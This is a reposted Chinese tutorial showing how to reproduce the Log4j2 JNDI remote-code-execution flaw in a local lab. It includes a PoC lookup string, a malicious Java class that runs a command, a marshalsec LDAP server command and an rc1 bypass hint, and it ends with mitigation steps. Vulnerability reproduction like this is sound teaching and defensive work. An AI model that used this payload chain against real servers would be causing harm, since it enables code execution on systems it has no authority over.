Redian新闻
>
手把手教你复现 Log4j2 漏洞

手把手教你复现 Log4j2 漏洞

公众号新闻

1. 简介

ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。

2. 漏洞概述

该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

3. 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

4. 环境搭建

1、创建一个新的maven项目,并导入Log4j的依赖包

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

漏洞利用

1、使用POC测试

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2、编译一恶意类Exploit.class

首先新建exp.java,然后编译为class文件

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}
javac exp.java

3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地开启一个LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit" 8888

4、运行poc.java,即可访问恶意类并执行写在其中的"calc"命令 

结合一些其它 StrLookup 适当变形,以及配合官方测试用例中脏数据"?Type=A Type&Name=1100110&Char=!"可绕过rc1,RC2版本对此异常进行了捕获。

5. 修复方式

目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 建议同时采用如下临时措施进行漏洞防范:

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。

链接:https://blog.csdn.net/qq_40989258/article/details/121862363

(版权归原作者所有,侵删)



微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
仙桃学术 | 生信怎么加湿实验?手把手教你4+干湿结合零代码复现在澳洲报税少不了,手把手教你在澳洲申请税号​!【更新】堪培拉留学新生指南:手把手教你从行李准备,国内上飞机,抵澳,到家躺下完全攻略!还包括入关,填入境卡,买车票哦~手把手教你注册海外Apple ID丢掉Excel,手把手教你用Python做可视化数据,还能任意调节动画丝滑度手把手教你看懂芯片行业:从交大热能系毕业,到硅谷芯片大厂总监最强留学生报税攻略!手把手教你如何获享最多退税【步骤】微信全面支持注册第二个账号:手把手教你搞定DC超市牛排种类/等级/烹饪方法,手把手教你在家做牛排,比餐馆还好吃!把婆婆的语音转成文字后全新4+干湿结合套路文章,手把手教你单基因泛癌分析[快来] Costco黑卡免120刀年费!十余年来最大力度!手把手教你怎么薅这波羊毛!3月1日开始报税了,手把手教你在新加坡如何交税干货!休斯顿超市牛排种类、等级、烹饪方法,手把手教你在家做出多汁嫩牛排手把手教你基于 Kubernetes 实现 CI/CD 配置2022我飞越三洲(2)离别大陆,飞往纽约开源意味着不问责,我们准备好应对比 Log4Shell 更大的安全危机了吗?|Log4j 一周年特别报道这个占数学试卷一半分的思维能力,手把手教你怎么启蒙!秋行南意—小村的故事(3)愚蠢和砖家,比病毒更难清零/疫情老图国自然申请倒计时,资深审查老师手把手教你“避坑”!【悦居省省】英国买二手车全攻略!手把手教你花小钱买好车~达拉斯超市牛排种类/等级/烹饪方法,手把手教你在家做牛排,比餐馆还好吃!手把手教你在伦敦挑居住区!满足这6大要素的才宜居!想吃腊味不用买!咸香鲜美有嚼劲,手把手教你做,比外面卖的好吃100倍~手把手教你在云上构建云原生应用!| Q推荐2023新版B1/B2 美国签证更新电子系统说明!手把手教你搞定!兔年新春聚会多?收藏这份保姆级攻略,手把手教你稳占C位!App“自动扣费”?手把手教你把钱要回来!一起薅羊毛的快乐!手把手教你订阅乐高杂志:一年5期都免费古罗马的罗马城:寻迹帝国的荣耀修完又复活!史诗级Log4j漏洞爆发1年仍“阴魂不散”,下一场暴雷可能已在路上美国退休金账户(IRA)利率5.1%了还不冲?手把手教你躺着拿钱手把手教你如何检查阿联酋签证的有效日期!阿联酋签证如何办理?攻略 | 手把手教你用积分兑换中美机票!
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。